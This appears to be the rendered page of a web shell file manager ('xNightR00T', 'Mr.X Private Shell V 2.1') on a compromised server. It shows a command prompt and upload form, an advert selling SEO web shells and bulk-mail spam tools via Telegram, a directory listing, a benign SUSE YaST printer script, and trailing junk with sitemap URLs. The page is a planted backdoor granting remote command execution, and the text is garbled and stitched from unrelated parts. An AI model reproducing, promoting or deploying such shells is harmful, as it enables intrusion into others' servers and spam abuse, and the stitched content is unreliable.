xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
#! /bin/bash
#
# Johannes Meixner <jsmeix@suse.de>, 2007, 2008, 2009, 2010, 2011

#set -x

# Make sure to have a clean environment:
export PATH="/sbin:/usr/sbin:/usr/bin:/bin"
export LC_ALL="POSIX"
export LANG="POSIX"
umask 022
# Disable bash file name globbing:
set -f

MY_NAME=${0##*/}
QUEUE="$1"
[ -z "$QUEUE" ] && { echo -en "\nUsage:\n$MY_NAME queue-name\n" 1>&2 ; exit 1 ; }

# Create temporary file name:
TMP_DATA=$(mktemp -u /tmp/$MY_NAME.XXXXXX)

# Test if lpstat is executable:
LPSTAT="$( type -P lpstat )"
if ! test -x "$LPSTAT"
then echo "Cannot execute lpstat" 1>&2
     exit 1
fi

# Test if lpoptions is executable:
LPOPTIONS="$( type -P lpoptions )"
if ! test -x "$LPOPTIONS"
then echo "Cannot execute lpoptions" 1>&2
     exit 1
fi

# Test if cupsd on localhost is accessible.
# Only on localhost print queue settings should be changed.
# CUPS supports to modify even remote queues but this is not supported by YaST.
# Therefore explicitly the cupsd on localhost is asked for printer driver options.
# Since CUPS 1.4 'lpstat -r' results true even when scheduler is not running.
# Therefore we must now grep in its output:
if $LPSTAT -h localhost -r | grep -q 'scheduler is not running'
then echo "Cannot access cupsd on localhost" 1>&2
     exit 2
fi

# Test if QUEUE exists:
if ! $LPSTAT -h localhost -p $QUEUE &>/dev/null
then echo "Queue $QUEUE not found on localhost" 1>&2
     exit 3
fi

# Input:

# Get the raw data:
# Continue even after timeout because then an empty YCP map is output
# which indicates that there are no driver options.
MAXIMUM_WAIT="10"
# The Adobe PPD specification reads that main keywords can contain
# any printable ASCII character within the range of
# decimal 33 (\041) to decimal 126 (\176) inclusive.
# Also keep newline and space but exclude " (\042) which
# is needed as YCP string delimiter:
$LPOPTIONS -h localhost -p $QUEUE -l | tr -c -d '\n \041\043-\176' >$TMP_DATA &
lpoptionsPID=$!
# Timeout stuff:
for i in $( seq $MAXIMUM_WAIT )
do ps $lpoptionsPID &>/dev/null || break
   sleep 1
done
if ps $lpoptionsPID &>/dev/null
then kill -9 $lpoptionsPID &>/dev/null
     echo "Aborted 'lpoptions' after $MAXIMUM_WAIT seconds timeout." 1>&2
fi

# Process the data:

# Simply remove hexadecimal substrings like '<A1B2C3>':

sed -i -e 's/<[^>]*>//g' $TMP_DATA

# Condense multiple spaces, convert tabs to blanks, and remove leading and trailing spaces:
sed -i -e 's/[[:space:]][[:space:]]*/ /g' \
       -e 's/^[[:space:]]*//' \
       -e 's/[[:space:]]*$//' $TMP_DATA

# Output header:
echo "[" 

# Make complete and seperated entries.
# The values are collected until a new "queue" line appears, then the values are output.
# The very first "queue" line doesn't result an output because "$URI" is an empty string.
exec <$TMP_DATA
IFS=':'
while read KEY VALUES
do KEYWORD=""
   TRANSLATION=""
   KEYWORD="$( echo $KEY | cut -s -d '/' -f 1 )"
   if [ -n "$KEYWORD" -a -n "$VALUES" ]
   then TRANSLATION="$( echo $KEY | cut -s -d '/' -f 2 )"
        echo -e "  \$[ \"keyword\":\"$KEYWORD\",\n     \"translation\":\"$TRANSLATION\",\n     \"values\": [ "
        IFS=' '
        for VALUE in $( echo $VALUES )
        do echo -e "                 \"$VALUE\","
        done
        IFS=':'
        echo -e "                 \"\"\n               ]\n  ],"
   fi
done

# Output the last entry and a footer for YCP
echo -e "  \$[]\n]"

# Remove the temporary files 
rm $TMP_DATA
exit 0


Filemanager

Name Type Size Permission Actions
autodetect_print_queues File 7.66 KB 0755
autodetect_printers File 4.16 KB 0755
autoyast-initscripts.sh File 727 B 0755
basicadd_displaytest File 6.25 KB 0755
check-all-syntax File 463 B 0755
check.boot File 145 B 0755
create_printer_ppd_database File 4.91 KB 0755
cups_client_only File 5.23 KB 0755
cut-messages File 526 B 0755
determine_printer_driver_options File 3.35 KB 0755
elf-arch File 6.25 KB 0755
fetch_image.sh File 1.01 KB 0755
ldap-server-ssl-check File 10.5 KB 0755
mask-systemd-units File 1.33 KB 0755
md_autorun File 6.23 KB 0755
modify_cupsd_conf File 52.18 KB 0755
parse_configs.pl File 11.95 KB 0755
remove_junk File 410 B 0755
startshell File 6.29 KB 0755
test_device File 883 B 0755
test_remote_ipp File 4.82 KB 0755
test_remote_lpd File 5.28 KB 0755
test_remote_novell File 1.75 KB 0755
test_remote_smb File 2 KB 0755
test_remote_socket File 2.2 KB 0755
tty_wrapper File 14.63 KB 0755
update_gfxmenu File 2.05 KB 0755
update_users_groups File 398 B 0755
y2base File 6.2 KB 0755
y2start File 1.56 KB 0755
yast2-funcs File 3.73 KB 0755
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml